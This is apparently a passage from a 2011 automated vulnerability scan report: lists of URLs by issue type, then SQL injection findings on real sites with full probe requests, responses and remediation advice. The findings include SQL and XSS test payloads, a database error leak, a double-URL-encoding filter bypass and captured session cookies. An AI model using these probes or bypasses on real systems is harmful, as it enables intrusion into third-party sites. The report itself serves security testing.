24.102. http://microsoftcambridge.com/Portals/0/teams/teams_header.png

24.103. http://microsoftcambridge.com/Portals/0/teams/teamsh2_MNIOL.png

24.104. http://microsoftcambridge.com/Portals/0/teams/teamsh2_msftonlineserv.png

24.105. http://microsoftcambridge.com/Portals/0/teams/tick.png

24.106. http://microsoftcambridge.com/Portals/0/teams/unifiedcom_inline.jpg

24.107. http://microsoftcambridge.com/Portals/0/teams/unifiedcomimg.jpg

24.108. http://microsoftcambridge.com/Portals/0/teams/unifiedcommunications.png

24.109. http://microsoftcambridge.com/favicon.ico

24.110. http://microsoftcambridge.com/images/help.gif

24.111. http://microsoftcambridge.com/images/spacer.gif

24.112. http://microsoftcambridge.com/img/bottom_back.png

24.113. http://microsoftcambridge.com/img/events/about.png

24.114. http://microsoftcambridge.com/img/events/about_ovr.png

24.115. http://microsoftcambridge.com/img/events/community.png

24.116. http://microsoftcambridge.com/img/events/community_ovr.png

24.117. http://microsoftcambridge.com/img/events/contact_us.png

24.118. http://microsoftcambridge.com/img/events/events.png

24.119. http://microsoftcambridge.com/img/events/featured_person.png

24.120. http://microsoftcambridge.com/img/events/header_back.png

24.121. http://microsoftcambridge.com/img/events/latest_feeds.png

24.122. http://microsoftcambridge.com/img/events/latest_tweet.png

24.123. http://microsoftcambridge.com/img/events/people.png

24.124. http://microsoftcambridge.com/img/events/people_ovr.png

24.125. http://microsoftcambridge.com/img/events/search.png

24.126. http://microsoftcambridge.com/img/events/share.png

24.127. http://microsoftcambridge.com/img/events/subscribe.png

24.128. http://microsoftcambridge.com/img/events/teams.png

24.129. http://microsoftcambridge.com/img/events/teams_ovr.png

24.130. http://microsoftcambridge.com/img/events/working.png

24.131. http://microsoftcambridge.com/img/events/working_ovr.png

24.132. http://microsoftcambridge.com/img/header_back.png

24.133. http://microsoftcambridge.com/img/home/about.png

24.134. http://microsoftcambridge.com/img/home/about_ovr.png

24.135. http://microsoftcambridge.com/img/home/community.png

24.136. http://microsoftcambridge.com/img/home/community_ovr.png

24.137. http://microsoftcambridge.com/img/home/contact_us.png

24.138. http://microsoftcambridge.com/img/home/events.png

24.139. http://microsoftcambridge.com/img/home/events_ovr.png

24.140. http://microsoftcambridge.com/img/home/footer_gallery.png

24.141. http://microsoftcambridge.com/img/home/latest_feeds.png

24.142. http://microsoftcambridge.com/img/home/latest_tweet.png

24.143. http://microsoftcambridge.com/img/home/people.png

24.144. http://microsoftcambridge.com/img/home/people_ovr.png

24.145. http://microsoftcambridge.com/img/home/search.png

24.146. http://microsoftcambridge.com/img/home/share.png

24.147. http://microsoftcambridge.com/img/home/subscribe.png

24.148. http://microsoftcambridge.com/img/home/teams.png

24.149. http://microsoftcambridge.com/img/home/teams_ovr.png

24.150. http://microsoftcambridge.com/img/home/working.png

24.151. http://microsoftcambridge.com/img/home/working_ovr.png

24.152. http://microsoftcambridge.com/img/microsoft-new-england-rdc.png

24.153. http://microsoftcambridge.com/img/microsoft_events_bg.jpg

24.154. http://microsoftcambridge.com/img/microsoft_home_bg.jpg

24.155. http://microsoftcambridge.com/img/microsoft_people_bg.jpg

24.156. http://microsoftcambridge.com/img/microsoft_teams_bg.jpg

24.157. http://microsoftcambridge.com/img/people/about.png

24.158. http://microsoftcambridge.com/img/people/about_ovr.png

24.159. http://microsoftcambridge.com/img/people/community.png

24.160. http://microsoftcambridge.com/img/people/community_ovr.png

24.161. http://microsoftcambridge.com/img/people/contact_us.png

24.162. http://microsoftcambridge.com/img/people/events.png

24.163. http://microsoftcambridge.com/img/people/events_ovr.png

24.164. http://microsoftcambridge.com/img/people/featured_team.png

24.165. http://microsoftcambridge.com/img/people/header_back.png

24.166. http://microsoftcambridge.com/img/people/latest_feeds.png

24.167. http://microsoftcambridge.com/img/people/latest_tweet.png

24.168. http://microsoftcambridge.com/img/people/people.png

24.169. http://microsoftcambridge.com/img/people/search.png

24.170. http://microsoftcambridge.com/img/people/share.png

24.171. http://microsoftcambridge.com/img/people/subscribe.png

24.172. http://microsoftcambridge.com/img/people/teams.png

24.173. http://microsoftcambridge.com/img/people/teams_ovr.png

24.174. http://microsoftcambridge.com/img/people/working.png

24.175. http://microsoftcambridge.com/img/people/working_ovr.png

24.176. http://microsoftcambridge.com/img/teams/about.png

24.177. http://microsoftcambridge.com/img/teams/about_ovr.png

24.178. http://microsoftcambridge.com/img/teams/community.png

24.179. http://microsoftcambridge.com/img/teams/community_ovr.png

24.180. http://microsoftcambridge.com/img/teams/contact_us.png

24.181. http://microsoftcambridge.com/img/teams/contentpane_back.png

24.182. http://microsoftcambridge.com/img/teams/events.png

24.183. http://microsoftcambridge.com/img/teams/events_ovr.png

24.184. http://microsoftcambridge.com/img/teams/featured_person.png

24.185. http://microsoftcambridge.com/img/teams/headerpane_back.png

24.186. http://microsoftcambridge.com/img/teams/latest_feeds.png

24.187. http://microsoftcambridge.com/img/teams/latest_tweet.png

24.188. http://microsoftcambridge.com/img/teams/people.png

24.189. http://microsoftcambridge.com/img/teams/people_ovr.png

24.190. http://microsoftcambridge.com/img/teams/search.png

24.191. http://microsoftcambridge.com/img/teams/share.png

24.192. http://microsoftcambridge.com/img/teams/subscribe.png

24.193. http://microsoftcambridge.com/img/teams/teams.png

24.194. http://microsoftcambridge.com/img/teams/working.png

24.195. http://microsoftcambridge.com/img/teams/working_ovr.png

24.196. http://static.ak.fbcdn.net/connect/xd_proxy.php

24.197. http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/HK9HyX1GgWJ.js

24.198. http://www.facebook.com/extern/login_status.php

24.199. http://www.facebook.com/extern/login_status.php

24.200. http://www.facebook.com/plugins/like.php

24.201. http://www.facebook.com/plugins/like.php

24.202. http://www.facebook.com/plugins/like.php

24.203. http://www.facebook.com/plugins/like.php

24.204. http://www.facebook.com/plugins/like.php

24.205. http://www.facebook.com/plugins/like.php

24.206. http://www.facebook.com/plugins/like.php

24.207. http://www.facebook.com/plugins/like.php

24.208. http://www.facebook.com/plugins/like.php

24.209. http://www.facebook.com/plugins/like.php

24.210. http://www.facebook.com/plugins/like.php

24.211. http://www.hbccards.com/SkinOverPlayStopSeekMuteVol.swf

24.212. http://www.hbccards.com/content_images/image/homepage_pic.jpg

24.213. http://www.hbccards.com/favicon.ico

24.214. http://www.hbccards.com/flash/sifr.swf

24.215. http://www.hbccards.com/flash_banner/player_V4.swf

24.216. http://www.hbccards.com/images/background.jpg

24.217. http://www.hbccards.com/images/box_bg1.jpg

24.218. http://www.hbccards.com/images/box_bg2.jpg

24.219. http://www.hbccards.com/images/box_bg3.jpg

24.220. http://www.hbccards.com/images/button_bg.jpg

24.221. http://www.hbccards.com/images/footer_bg.jpg

24.222. http://www.hbccards.com/images/hbc_logo.jpg

24.223. http://www.hbccards.com/images/icon_events.jpg

24.224. http://www.hbccards.com/images/icon_live_chat.jpg

24.225. http://www.hbccards.com/images/icon_newsletter.jpg

24.226. http://www.hbccards.com/images/nav_contact.jpg

24.227. http://www.hbccards.com/images/nav_contact_on.jpg

24.228. http://www.hbccards.com/images/nav_gc.jpg

24.229. http://www.hbccards.com/images/nav_gc_on.jpg

24.230. http://www.hbccards.com/images/nav_learnmore.jpg

24.231. http://www.hbccards.com/images/nav_learnmore_on.jpg

24.232. http://www.hbccards.com/images/nav_left_inside_bg.jpg

24.233. http://www.hbccards.com/images/nav_usegc.jpg

24.234. http://www.hbccards.com/images/nav_usegc_on.jpg

24.235. http://www.hbccards.com/images/nav_whyhbc.jpg

24.236. http://www.hbccards.com/images/nav_whyhbc_on.jpg

24.237. http://www.hbccards.com/images/poweredby.jpg

24.238. http://www.hbccards.com/images/sec_nav_bg.jpg

24.239. http://www.hbccards.com/images/spacer.jpg

24.240. http://www.hbccards.com/images/spacer2.jpg

25. Social security numbers disclosed

25.1. http://www.hbccards.com/

25.2. http://www.hbccards.com/ordernow.asp

26. Robots.txt file

26.1. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12

26.2. http://api.search.live.net/json.aspx

26.3. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x75

26.4. http://atgincorporated.com/atgmenu_11.gif

26.5. http://b.scorecardresearch.com/r

26.6. http://clients1.google.com/complete/search

26.7. http://dominionenterprises.112.2o7.net/b/ss/desoundings/1/H.22.1/s0369559922255

26.8. http://googleads.g.doubleclick.net/pagead/ads

26.9. http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Dom_Ent/HuckinsYacht-Sound-Rect-300x250/huckins_0311.swf/1299012270

26.10. http://music.aol.com/_uac/adpage.html

26.11. http://o.sa.aol.com/b/ss/aolcommem,aolsvc/1/H.21/s83462371905334

26.12. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/1161054613/Top/Dom_Ent/Google-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/72634857383031356952384144615a52

26.13. http://pagead2.googlesyndication.com/pagead/imgad

26.14. http://pixel.quantserve.com/pixel

26.15. http://portal.smartertools.com/ST.ashx

26.16. http://s0.2mdn.net/2450389/Capella_DR_standard_Online_Learn_728x90.swf

26.17. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEY6_ACIPTwAioFcrgAAAcyBWu4AAB_

26.18. http://safebrowsing.clients.google.com/safebrowsing/downloads

26.19. https://secure.shareit.com/favicon.ico

26.20. http://segment-pixel.invitemedia.com/pixel

26.21. http://static.ak.fbcdn.net/connect/xd_proxy.php

26.22. http://toolbarqueries.clients.google.com/tbproxy/af/query

26.23. http://tools.google.com/service/update2

26.24. http://www.citysbest.com/media/citysbest-min.css

26.25. http://www.cramerdev.com/weblog/

26.26. https://www.godaddy.com/

26.27. http://www.google-analytics.com/__utm.gif

26.28. http://www.google.com/uds/

26.29. http://www.googleadservices.com/pagead/conversion/1028748950/

26.30. http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html%20%20

26.31. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php

26.32. http://www.manitu.de/

26.33. http://www.pandasecurity.com/virus_info/flash/pandaThreatWatch_migracion.swf

26.34. https://www.plimus.com/jsp/buynow.jsp

26.35. http://www.smartertools.com/

26.36. http://www.soundingsonline.com/archives/'+NSFTW+'

26.37. http://www.sqlite.org/

26.38. https://www.supermedia.com/spportal/spportalFlow.do

26.39. http://www.superpages.com/inc/social/soc.php

26.40. https://www.territoryahead.com/jump.jsp

26.41. http://www.trustlogo.com/trustlogo/javascript/cot.js

27. Cacheable HTTPS response

27.1. https://a12.alphagodaddy.com/

27.2. https://feedback.discoverbing.com/default.aspx

27.3. https://feedback.discoverbing.com/jsinterface.aspx

27.4. https://secure.shareit.com/shareit/checkout.html

27.5. https://www.godaddy.com/gdshop/blank.htm

27.6. https://www.plimus.com/jsp/ajax/buynow_free_email_domain.jsp

27.7. https://www.plimus.com/jsp/buynow.jsp

27.8. https://www.plimus.com/jsp/buynow_analytics.jsp

27.9. https://www.supermedia.com/help

27.10. https://www.supermedia.com/help/direct-mail

27.11. https://www.supermedia.com/help/domains-email

27.12. https://www.supermedia.com/help/local-search-marketing

27.13. https://www.supermedia.com/help/web-site-design

27.14. https://www.supermedia.com/spportal/404.jsp

27.15. https://www2.hbc.com/contactus/contact-us.asp

28. Multiple content types specified

29. HTML does not specify charset

29.1. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45

29.2. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12

29.3. http://ad.doubleclick.net/adi/huffpost.politics/news

29.4. http://atgincorporated.com/atgmenu_11.gif

29.5. http://atgincorporated.com/images/atgmenu_11_hover.gif

29.6. http://atgincorporated.com/images/atgmenu_12_hover.gif

29.7. http://atgincorporated.com/images/atgmenu_13_hover.gif

29.8. http://atgincorporated.com/images/atgmenu_14_hover.gif

29.9. http://atgincorporated.com/images/atgmenu_15_hover.gif

29.10. http://atgincorporated.com/images/atgmenu_17_hover.gif

29.11. http://atgincorporated.com/qmimages/gradient_11.gif

29.12. http://bidder.mathtag.com/iframe/notify

29.13. http://cloudscan.org/VaUcX/welcome.html

29.14. http://cloudscan.org/favicon.ico

29.15. http://cloudscan.org/welcome.html

29.16. http://hbc.com/

29.17. http://hmficweb.hinghammutual.com/billing_view/PaymentDetails.asp

29.18. http://image3.pubmatic.com/AdServer/UPug

29.19. http://js.adsonar.com/js/pass.html

29.20. http://music.aol.com/_uac/adpage.html

29.21. http://music.aol.com/proxy/promo/

29.22. http://my-happyfeet.com/images/about2.gif

29.23. http://my-happyfeet.com/images/faq2.gif

29.24. http://my-happyfeet.com/undefined

29.25. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/

29.26. http://www.aamraresources.com/

29.27. http://www.bluestarfibres.com/favicon.ico

29.28. http://www.fast-report.com/bitrix/redirect3.php

29.29. https://www.godaddy.com/sso/keepalive.aspx

29.30. http://www.manitu.de/webhosting/header/

29.31. http://www.manitu.de/webhosting/home/

29.32. http://www.manitu.de/webhosting/nav/

29.33. http://www.manitu.de/webhosting/status/

29.34. http://www.manitu.de/webhosting/subnav/

29.35. http://www.my-happyfeet.com/images/about2.gif

29.36. http://www.my-happyfeet.com/images/faq2.gif

29.37. http://www.nutter.com/careers.ph

29.38. http://www.nutter.com/careers.php

29.39. http://www.nutter.com/media/swf/media/industries/media.212.jpg

29.40. http://www.pandasecurity.com/virus_info/exports/fecha_hora.asp

29.41. http://www.paperg.com/jsfb/embed.php

30. HTML uses unrecognised charset

30.1. http://www.fast-report.com/bitrix/redirect2.php

30.2. http://www.fast-report.com/en/buy/

30.3. http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html

30.4. http://www.fast-report.com/en/download/fastreport.net-download.html

30.5. http://www.fast-report.com/en/download/fastreport.net-download.html/

30.6. http://www.fast-report.com/en/products/

30.7. http://www.fast-report.com/en/products/FastReport.Net.html

31. Content type incorrectly stated

31.1. http://a.rad.msn.com/ADSAdClient31.dll

31.2. http://a12.alphagodaddy.com/

31.3. https://a12.alphagodaddy.com/

31.4. http://blogs.technet.com/analyticsid.aspx

31.5. http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx

31.6. https://feedback.discoverbing.com/jsinterface.aspx

31.7. http://image3.pubmatic.com/AdServer/UPug

31.8. http://maps.slapi0.virtualearth.net/EntityDetails.ashx

31.9. http://microsoftcambridge.com/Portals/0/teams/sharepoint_inline.png

31.10. http://microsoftcambridge.com/favicon.ico

31.11. http://microsoftcambridge.com/slideshow/Vertigo.small.xap

31.12. http://o.aolcdn.com/os_merge/

31.13. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/makeRequest

31.14. http://pglb.buzzfed.com/10032/5d8526ab7c4243a9a90f4ea3af7d7ab9

31.15. http://portalblog.aol.com/media/background_new.gif

31.16. http://rad.msn.com/ADSAdClient31.dll

31.17. http://sales.liveperson.net/hcp/html/mTag.js

31.18. http://sc1.maps.live.com/i/bin/20110317.509/action_item_bullet.gif

31.19. http://technet.microsoft.com/clientaccesspolicy.xml

31.20. http://technet.microsoft.com/en-us/library/bb126093(n).aspx

31.21. http://technet.microsoft.com/en-us/library/bb905490(n).aspx

31.22. http://technet.microsoft.com/en-us/library/cc440494(n).aspx

31.23. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/

31.24. http://www.aol.com/ajax.jsp

31.25. https://www.godaddy.com/sso/keepalive.aspx

31.26. http://www.huffingtonpost.com/badge/badges_json_v2.php

31.27. http://www.insideup.com/ppc/leadflow/hins00/project.php

31.28. http://www.insideup.com/ppc/leadflow/style/blackdot.gif

31.29. http://www.manitu.de/webhosting/home/images/homepagekosten-verfuegbarkeit.gif

31.30. http://www.pandasecurity.com/virus_info/exports/fecha_hora.asp

31.31. http://www.paperg.com/jsfb/embed.php

31.32. http://www.trafficland.com/bing/data.cry

32. SSL certificate

32.1. https://secure.avangate.com/

32.2. https://secure.shareit.com/

32.3. https://www.godaddy.com/

32.4. https://www.plimus.com/

32.5. https://www.supermedia.com/

32.6. https://www.territoryahead.com/

32.7. https://www2.hbc.com/



1. SQL injection
There are 28 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://learn.shavlik.com/shavlik/index.cfm [h parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://learn.shavlik.com
Path:   /shavlik/index.cfm

Issue detail

The h parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the h parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /shavlik/index.cfm?m=1009&pg=697&h=98%20and%201%3d1--%20&hp=69 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=610666; CFTOKEN=95679479; __utmz=202100691.1300711269.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=202100691.944756920.1300711269.1300711269.1300711269.1

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Mar 2011 21:04:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


...[SNIP]...
<!-- 1 697 -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Shavlik</title>


<link rel="stylesheet" href="style/style5.css" type="text/css" media="all" />
<!--[if IE 6]>
<style>
#navitem a {padding-bottom:0px;}
</style>
<![endif]-->
   <script language="javascript" type="text/javascript">
       function windowOpen(sURL, bFade, sWindowName) {
   
           if (bFade) {
               document.getElementById("body").style.backgroundColor = "gray";
           }
           
           sWindowName = sWindowName || "newWindow";
           
           nPosX = (window.screen.width/2) - (400);
           nPosY = (window.screen.height/2) - (350 + 75);
           
           newWindow = window.open(sURL,sWindowName,"status=0,toolbar=0,scrollbars=1,width=800,height=600,screenX=" + nPosX + ",screenY=" + nPosY);
           
           newWindow.focus();
               
           }
               
   
   var req;

function docLoad(url) {
   req = false;
// non IE
if(window.XMLHttpRequest && !(window.ActiveXObject)) {
   try {
           req = new XMLHttpRequest();
} catch(e) {
           req = false;
}
// IE
} else if(window.ActiveXObject) {
   try {
   req = new ActiveXObject("Msxml2.XMLHTTP");
   } catch(e) {
   try {
       req = new ActiveXObject("Microsoft.XMLHTTP");
   } catch(e) {
       req = false;
   }
       }
}

   if(req) {
       //req.onreadystatechange = processReqChange;
       req.open("GET",
...[SNIP]...

Request 2

GET /shavlik/index.cfm?m=1009&pg=697&h=98%20and%201%3d2--%20&hp=69 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=610666; CFTOKEN=95679479; __utmz=202100691.1300711269.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=202100691.944756920.1300711269.1300711269.1300711269.1

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Mar 2011 21:04:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


...[SNIP]...
<!-- 0 697 -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Shavlik</title>


<link rel="stylesheet" href="style/style5.css" type="text/css" media="all" />
<!--[if IE 6]>
<style>
#navitem a {padding-bottom:0px;}
</style>
<![endif]-->
   <script language="javascript" type="text/javascript">
       function windowOpen(sURL, bFade, sWindowName) {
   
           if (bFade) {
               document.getElementById("body").style.backgroundColor = "gray";
           }
           
           sWindowName = sWindowName || "newWindow";
           
           nPosX = (window.screen.width/2) - (400);
           nPosY = (window.screen.height/2) - (350 + 75);
           
           newWindow = window.open(sURL,sWindowName,"status=0,toolbar=0,scrollbars=1,width=800,height=600,screenX=" + nPosX + ",screenY=" + nPosY);
           
           newWindow.focus();
               
           }
               
   
   var req;

function docLoad(url) {
   req = false;
// non IE
if(window.XMLHttpRequest && !(window.ActiveXObject)) {
   try {
           req = new XMLHttpRequest();
} catch(e) {
           req = false;
}
// IE
} else if(window.ActiveXObject) {
   try {
   req = new ActiveXObject("Msxml2.XMLHTTP");
   } catch(e) {
   try {
       req = new ActiveXObject("Microsoft.XMLHTTP");
   } catch(e) {
       req = false;
   }
       }
}

   if(req) {
       //req.onreadystatechange = processReqChange;
       req.open("GET", url, false);
       r
...[SNIP]...

1.2. http://learn.shavlik.com/shavlik/index.cfm [m parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://learn.shavlik.com
Path:   /shavlik/index.cfm

Issue detail

The m parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the m parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /shavlik/index.cfm?m=1009'&pg=697&h=02edf0--%3E%3Cscript%3Ealert(1)%3C/script%3Ee58fc9f9062&hp=69 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=610666; CFTOKEN=95679479; __utmz=202100691.1300711269.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=202100691.944756920.1300711269.1300711269.1300711269.1

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Fri, 25 Mar 2011 20:42:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                                                       
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND DMMESSAGE.userCompanyID = 21
               ORDER BY
               DMMESSAGE.ID' at line 7
</font>
...[SNIP]...

1.3. http://order.1and1.com/xml/jasmin/get/110325-1413/frontend-stopper-main+info-footnote+qx-lightbox+swfobject+!qx-backbutton+!hosting-en+!econda-tracking+suffix/js-min/AC:default [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://order.1and1.com
Path:   /xml/jasmin/get/110325-1413/frontend-stopper-main+info-footnote+qx-lightbox+swfobject+!qx-backbutton+!hosting-en+!econda-tracking+suffix/js-min/AC:default

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /xml/jasmin/get/110325-1413%2527/frontend-stopper-main+info-footnote+qx-lightbox+swfobject+!qx-backbutton+!hosting-en+!econda-tracking+suffix/js-min/AC:default HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__reuse=1301085812313
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4f6d1cc610415400; emos1und1d1_jcsid=AAABLu7Cx_zt8xXxYBlocQB77**YqU*t:1:AAABLu7Cx_wZVGEkt*DMxXkpVLopiumS:1301085865980; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:4:AAABLu7Cx_zt8xXxYBlocQB77**YqU*t:1301085865980:0:false:10; UT=Kcmc3OjsxWlpaVGddZCpiXCkbJXVoYjpRRD4mKicnJiQmJCEhJCMdICQXMC8uK1A+al9hbycpJFQtV2YsHyAcGyAzMTQyLDQrKjNrbDIoLl5nLSAhHR0bIjU3Ly8vLCw=

Response 1

HTTP/1.1 503 Service Temporarily Unavailable
Date: Sat, 26 Mar 2011 00:25:33 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 388
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>503 Service Temporarily Unavailable</title>
</head><body>
<h1>Service Temporarily Unavailable</h1>
<p>The server is temporarily u
...[SNIP]...

Request 2

GET /xml/jasmin/get/110325-1413%2527%2527/frontend-stopper-main+info-footnote+qx-lightbox+swfobject+!qx-backbutton+!hosting-en+!econda-tracking+suffix/js-min/AC:default HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__reuse=1301085812313
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4f6d1cc610415400; emos1und1d1_jcsid=AAABLu7Cx_zt8xXxYBlocQB77**YqU*t:1:AAABLu7Cx_wZVGEkt*DMxXkpVLopiumS:1301085865980; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:4:AAABLu7Cx_zt8xXxYBlocQB77**YqU*t:1301085865980:0:false:10; UT=Kcmc3OjsxWlpaVGddZCpiXCkbJXVoYjpRRD4mKicnJiQmJCEhJCMdICQXMC8uK1A+al9hbycpJFQtV2YsHyAcGyAzMTQyLDQrKjNrbDIoLl5nLSAhHR0bIjU3Ly8vLCw=

Response 2

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 00:25:33 GMT
Server: Apache
Expires: Sat, 26 Mar 2011 00:35:33 GMT
Cache-Control: max-age=600
Cache-Control: private
Content-Type: text/javascript;charset=utf-8
Content-Length: 85939

UNOUNO.namespace("global");UNOUNO.global.Functions={getElementsByClassName:function(clsName,element){var retVal=[];var elements;if(element){elements=element.getElementsByTagName("*");}else{elements=do
...[SNIP]...

1.4. http://order.1and1.com/xml/jasmin/get/110325-1413/prefix+qx-backbutton+hosting-en+econda-tracking/js-min/AC:default [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://order.1and1.com
Path:   /xml/jasmin/get/110325-1413/prefix+qx-backbutton+hosting-en+econda-tracking/js-min/AC:default

Issue detail

